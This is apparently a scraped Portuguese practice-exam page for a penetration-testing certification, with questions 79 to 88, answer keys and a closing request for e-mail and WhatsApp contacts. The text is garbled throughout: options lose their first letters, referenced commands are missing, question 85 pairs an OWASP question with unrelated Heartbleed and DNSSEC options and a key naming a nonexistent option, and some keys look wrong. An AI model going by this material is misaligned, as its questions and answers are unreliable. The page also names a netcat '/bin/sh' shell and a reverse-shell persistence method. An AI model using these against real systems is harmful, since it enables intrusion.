Uma empresa de consultoria está a preencher o ROE durante a delimitação do âmbito de aplicação. Qual das seguintes opções deve ser incluída no ROE?
A. Custo da avaliação
B. Distribuição dos relatórios
C. Restrições de ensaio
D. Responsabilidade
Ver resposta
Resposta correta: C
Pergunta #79
Um computador CentOS foi explorado durante um teste de penetração. Durante o reconhecimento inicial, o testador de penetração descobriu que a porta 25 estava aberta em um servidor deSendmail interno. Para permanecer furtivo, o testador executou o seguinte comando a partir da máquina de ataque: Qual dos seguintes seria o MELHOR comando a ser usado para progredir na rede alvo?
A. c 10
B. sh 10
C. c 127
D. sh 127
Ver resposta
Resposta correta: C
Pergunta #80
Um testador de penetração obteve acesso root a um servidor de arquivos baseado em Linux e gostaria de manter a persistência após a reinicialização. Qual das seguintes técnicas seria a MELHOR para apoiar este objetivo?
A. riar um serviço de sistema de disparo único para estabelecer uma shell inversa
B. Obter o ficheiro /etc/shadow e aplicar força bruta à palavra-passe do root
C. un the nc ג€"e /bin/sh <ג€¦> command
D. eslocar-se lateralmente para criar uma conta de utilizador no LDAP
Ver resposta
Resposta correta: A
Pergunta #81
Um técnico de testes de penetração está a iniciar uma avaliação, mas apenas dispõe de informações publicamente disponíveis sobre a empresa-alvo. O cliente tem conhecimento deste exercício e está a preparar-se para o teste. Qual das seguintes opções descreve o âmbito da avaliação?
A. Teste de ambiente parcialmente conhecido
B. Ensaios em ambiente conhecido
C. Teste de ambiente desconhecido
D. Teste do ambiente físico
Ver resposta
Resposta correta: C
Pergunta #82
Um diretor de segurança da informação pretende que um técnico de testes de penetração avalie se uma firewall recentemente instalada está a proteger uma sub-rede na qual estão ligados muitos sistemas antigos com décadas de existência. O técnico de testes de penetração decide executar uma descoberta de sistema operativo e uma análise completa de portas para identificar todos os sistemas e qualquer potencial vulnerabilidade. Qual das seguintes opções deve o analista de penetração considerar ANTES de executar uma análise?
A. O momento da análise
B. As limitações da largura de banda
C. O inventário dos activos e das versões
D. O tipo de digitalização
Ver resposta
Resposta correta: C
Pergunta #83
Um técnico de testes de penetração preparou a seguinte mensagem de correio eletrónico de phishing para um teste de penetração futuro: Qual das seguintes opções o técnico de testes de penetração está a utilizar MAIS para influenciar os alvos de phishing a clicarem na ligação?
A. Familiaridade e semelhança
B. Autoridade e urgência
C. Escassez e medo
D. Prova social e ganância
Ver resposta
Resposta correta: B
Pergunta #84
Uma empresa de segurança foi contratada para efetuar uma avaliação de ameaças internas para tentar obter acesso ao servidor de recursos humanos que contém informações pessoais e dados salariais. Os testadores de penetração receberam uma posição inicial na rede interna. Qual das seguintes acções, se realizada, seria ética dentro do âmbito da avaliação?
A. Exploração de uma falha de configuração na base de dados SQL
B. nterceção do tráfego TLS de saída
C. Obtenção de acesso a anfitriões através da injeção de malware no servidor de actualizações de toda a empresa
D. Aproveitamento de uma vulnerabilidade na AC interna para emitir certificados de cliente fraudulentos
E. stabelecer e manter a persistência no controlador de domínio
Ver resposta
Resposta correta: A
Pergunta #85
Quais dos seguintes riscos de segurança das aplicações Web fazem parte do OWASP Top 10 v2017? (Escolha dois.)
A. Este dispositivo pode estar vulnerável ao bug Heartbleed devido à forma como as transacções sobre TCP/22 tratam os pacotes de extensão heartbeat, permitindo que os atacantes obtenham informações sensíveis da memória do processo
B. Este dispositivo é muito provavelmente um gateway com serviços de gestão em banda
C. Este dispositivo é muito provavelmente um servidor proxy que encaminha pedidos através de TCP/443
D. Este dispositivo pode estar vulnerável à execução remota de código devido a uma vulnerabilidade de estouro de buffer no método usado para extrair nomes DNS de pacotes antes da validação DNSSEC
Ver resposta
Resposta correta: BE
Pergunta #86
Um testador de penetração deseja identificar CVEs que podem ser aproveitados para obter execução em um servidor Linux que tem um SSHD em execução
A. xecutar o nmap com as opções -O, -p22 e -sC definidas para o alvo
B. Executar o nmap com as opções -sV e -p22 definidas para o alvo
C. Executar o nmap com a opção --script vulners definida contra o alvo
D. xecutar o nmap com a opção -sA definida contra o alvo
Ver resposta
Resposta correta: D
Pergunta #87
Um técnico de testes de penetração está a analisar a rede de um laboratório de uma empresa em busca de serviços potencialmente vulneráveis. Qual dos seguintes comandos do Nmap irá devolver portas vulneráveis que podem ser interessantes para um potencial atacante?
A. map 192
B. map 192
C. map 192
D. map 192
Ver resposta
Resposta correta: C
Pergunta #88
Qual dos seguintes documentos descreve actividades, resultados e calendários específicos para um técnico de testes de penetração?
A. DA
B. SA
C. OW
D. OU
Ver resposta
Resposta correta: C

Ver as respostas após o envio

Por favor, envie seu e-mail e WhatsApp para obter respostas às perguntas.

Observação: certifique-se de que seu ID de e-mail e Whatsapp sejam válidos para que você possa obter os resultados corretos do exame.

E-mail:
WhatsApp/número de telefone: